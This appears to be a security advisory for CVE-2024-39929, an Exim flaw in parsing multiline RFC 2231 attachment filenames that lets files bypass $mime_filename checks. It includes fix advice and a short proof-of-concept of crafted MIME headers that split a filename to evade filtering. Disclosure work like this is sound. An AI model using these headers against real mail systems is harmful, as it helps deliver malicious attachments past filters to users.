Improper Input Validation Affecting exim/exim package, versions [,4.98-RC3)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (17th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-UNMANAGED-EXIMEXIM-7430257
- published 8 Jul 2024
- disclosed 4 Jul 2024
- credit Unknown
Introduced: 4 Jul 2024
CVE-2024-39929 Open this link in a new tabHow to fix?
Upgrade exim/exim
to version 4.98-RC3 or higher.
Overview
Affected versions of this package are vulnerable to Improper Input Validation in handling multiline RFC 2231
header filenames. An attacker can compose attachment headers that allow sending a malicious file that bypasses $mime_filename
checks. If this file contains a malicious executable and the attacker convinces a user to open it it may execute malicious code.
PoC
MIME-Version: 1.0
Content-Type: application/pdf;
name*0*=iso-8859-1''xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.pd;
name*1=f
Content-Disposition: attachment;
filename*0*=iso-8859-1''xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
filename*1=x.pdf
Content-Transfer-Encoding: base64